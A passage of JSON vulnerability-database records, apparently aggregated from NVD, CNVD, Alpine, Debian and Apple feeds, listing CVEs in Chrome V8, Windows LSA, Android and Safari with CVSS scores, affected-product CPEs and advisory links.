"userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-09T22:15:00", "type": "cve", "title": "CVE-2021-21195", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21195"], "modified": "2021-06-01T20:25:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34", "cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21195", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:29:53", "description": "Windows LSA Spoofing Vulnerability.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-10T21:15:00", "type": "cve", "title": "CVE-2022-26925", "cwe": ["CWE-290"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26925"], "modified": "2022-10-07T18:08:00", "cpe": ["cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2022-26925", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26925", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*"]}, {"lastseen": "2023-05-27T14:40:31", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T22:15:00", "type": "cve", "title": "CVE-2021-30551", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2022-09-28T20:02:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-30551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:23:51", "description": "A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22587", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2022-03-28T16:49:00", "cpe": [], "id": "CVE-2022-22587", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22587", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-14T14:24:15", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22620", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-09-09T20:41:00", "cpe": [], "id": "CVE-2022-22620", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-03T14:36:25", "description": "objects.cc in Google V8 before 5.2.361.27, as used in Google Chrome before 52.0.2743.82, does not prevent API interceptors from modifying a store target without setting a property, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5128", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106", "cpe:/a:google:v8:5.2.360"], "id": "CVE-2016-5128", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5128", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*", "cpe:2.3:a:google:v8:5.2.360:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:35:39", "description": "Windows LSA Spoofing Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-08-12T18:15:00", "type": "cve", "title": "CVE-2021-36942", "cwe": ["CWE-290"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942"], "modified": "2022-04-01T13:10:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-36942", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36942", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}], "cnvd": [{"lastseen": "2022-11-04T13:19:26", "description": "Google Android is a Linux-based open source operating system from Google, Inc. An elevation-of-privilege vulnerability exists in Google Android due to a code logic error in kbase_jd_user_buf_pin_pages in mali_kbase_mem.c. error. An attacker could exploit this vulnerability to elevate local privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-23T00:00:00", "type": "cnvd", "title": "Google Android Elevation of Privilege Vulnerability (CNVD-2022-22949)", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39793"], "modified": "2022-03-28T00:00:00", "id": "CNVD-2022-22949", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-22949", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "alpinelinux": [{"lastseen": "2023-06-23T11:05:31", "description": "Use after free in V8 in Google Chrome prior to 89.0.4389.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-09T22:15:00", "type": "alpinelinux", "title": "CVE-2021-21195", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21195"], "modified": "2021-06-01T20:25:00", "id": "ALPINE:CVE-2021-21195", "href": "https://security.alpinelinux.org/vuln/CVE-2021-21195", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T11:06:14", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "alpinelinux", "title": "CVE-2022-22620", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-09-09T20:41:00", "id": "ALPINE:CVE-2022-22620", "href": "https://security.alpinelinux.org/vuln/CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T11:05:32", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T22:15:00", "type": "alpinelinux", "title": "CVE-2021-30551", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2022-09-28T20:02:00", "id": "ALPINE:CVE-2021-30551", "href": "https://security.alpinelinux.org/vuln/CVE-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-05-27T15:12:16", "description": "Use after free in V8 in Google Chrome prior to 89.0.4389.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-09T22:15:00", "type": "debiancve", "title": "CVE-2021-21195", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21195"], "modified": "2021-04-09T22:15:00", "id": "DEBIANCVE:CVE-2021-21195", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21195", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:12:16", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T22:15:00", "type": "debiancve", "title": "CVE-2021-30551", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2021-06-15T22:15:00", "id": "DEBIANCVE:CVE-2021-30551", "href": "https://security-tracker.debian.org/tracker/CVE-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-09T02:50:58", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {}, "published": "2022-03-18T18:15:00", "type": "debiancve", "title": "CVE-2022-22620", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2022-03-18T18:15:00", "id": "DEBIANCVE:CVE-2022-22620", "href": "https://security-tracker.debian.org/tracker/CVE-2022-22620", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-14T17:47:15", "description": "objects.cc in Google V8 before 5.2.361.27, as used in Google Chrome before 52.0.2743.82, does not prevent API interceptors from modifying a store target without setting a property, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5128", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5128", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5128", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "apple": [{"lastseen": "2023-06-28T22:04:41", "description": "# About the security content of Safari 15.3\n\nThis document describes the security content of Safari 15.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## Safari 15.3*\n\nReleased February 10, 2022\n\n**WebKit**\n\nAvailable for: macOS Big Sur and macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22620: an anonymous researcher\n\n\n\n* After installing this update, the build number for Safari 15.3 is 16612.4.9.1.8 on macOS Big Sur and 15612.4.9.1.8 on macOS Catalina.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: February 10, 2022\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 